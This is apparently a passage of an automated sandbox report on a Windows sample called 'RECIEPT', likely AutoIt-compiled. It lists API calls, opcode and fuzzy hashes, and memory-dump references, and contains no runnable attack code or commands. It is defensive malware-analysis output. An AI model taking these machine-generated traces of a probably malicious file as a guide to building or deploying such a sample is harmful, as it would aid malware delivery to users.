                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                        • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                        • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                        • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                        • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                        • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                        • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: N@
                                        • API String ID: 0-1509896676
                                        • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                        • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                        • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                        • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                        • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                        • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                        • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                        • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                        • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                        • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                        • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                        • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                        • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2401390956.0000000003F07000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F07000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3f07000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                        • Instruction ID: 795d61812f9929497fea3369082cf1f7807ecf99debe0185fff0c3da755ab030
                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                        • Instruction Fuzzy Hash: 8E41A171D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2401390956.0000000003F07000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F07000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3f07000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                        • Instruction ID: 534680f6ac17b36342f26d304728c50ce7e66e4cf97d9cc7398e68dfa2f446d0
                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                        • Instruction Fuzzy Hash: F6019279E10209EFCB44DF98C5909AEF7B5FB48310F208599D909A7741D730AE51DB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2401390956.0000000003F07000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F07000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3f07000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                        • Instruction ID: ee4b9705225efd6b53a575fdb3818794100e0d6bc9e98e4181cd6147e4690441
                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                        • Instruction Fuzzy Hash: 94019279E10209EFCB44DF98C5909AEF7B5FB88310F248599D919A7741D730AE41EB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2401390956.0000000003F07000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F07000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3f07000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                        APIs
                                        • DeleteObject.GDI32(?), ref: 0045953B
                                        • DeleteObject.GDI32(?), ref: 00459551
                                        • DestroyWindow.USER32(?), ref: 00459563
                                        • GetDesktopWindow.USER32 ref: 00459581
                                        • GetWindowRect.USER32(00000000), ref: 00459588
                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                        • ShowWindow.USER32(?,00000004), ref: 00459865
                                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                        • GetStockObject.GDI32(00000011), ref: 004598CD
                                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                        • DeleteDC.GDI32(00000000), ref: 004598F8
                                        • _wcslen.LIBCMT ref: 00459916
                                        • _wcscpy.LIBCMT ref: 0045993A
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                        • GetDC.USER32(00000000), ref: 004599FC
                                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                        • String ID: $AutoIt v3$DISPLAY$static
                                        • API String ID: 4040870279-2373415609
                                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 0044181E
                                        • SetTextColor.GDI32(?,?), ref: 00441826
                                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                        • GetSysColor.USER32(0000000F), ref: 00441849
                                        • SetBkColor.GDI32(?,?), ref: 00441864
                                        • SelectObject.GDI32(?,?), ref: 00441874
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                        • GetSysColor.USER32(00000010), ref: 004418B2
                                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                        • DeleteObject.GDI32(?), ref: 004418D5
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                        • FillRect.USER32(?,?,?), ref: 00441970
                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                        • String ID:
                                        • API String ID: 69173610-0
                                        • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                        • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                        APIs
                                        • DestroyWindow.USER32(?), ref: 004590F2
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                        • GetStockObject.GDI32(00000011), ref: 004592AC
                                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                        • DeleteDC.GDI32(00000000), ref: 004592D6
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                        • GetStockObject.GDI32(00000011), ref: 004593D3
                                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-517079104
                                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 1038674560-3360698832
                                        • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                        • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                        APIs
                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                        • SetCursor.USER32(00000000), ref: 0043075B
                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                        • SetCursor.USER32(00000000), ref: 00430773
                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                        • SetCursor.USER32(00000000), ref: 0043078B
                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                        • SetCursor.USER32(00000000), ref: 004307A3
                                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                        • SetCursor.USER32(00000000), ref: 004307BB
                                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                        • SetCursor.USER32(00000000), ref: 004307D3
                                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                        • SetCursor.USER32(00000000), ref: 004307EB
                                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                        • SetCursor.USER32(00000000), ref: 00430803
                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                        • SetCursor.USER32(00000000), ref: 0043081B
                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                        • SetCursor.USER32(00000000), ref: 00430833
                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                        • SetCursor.USER32(00000000), ref: 0043084B
                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                        • SetCursor.USER32(00000000), ref: 00430863
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                        • SetCursor.USER32(00000000), ref: 0043087B
                                        • SetCursor.USER32(00000000), ref: 00430887
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                        • SetCursor.USER32(00000000), ref: 0043089F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
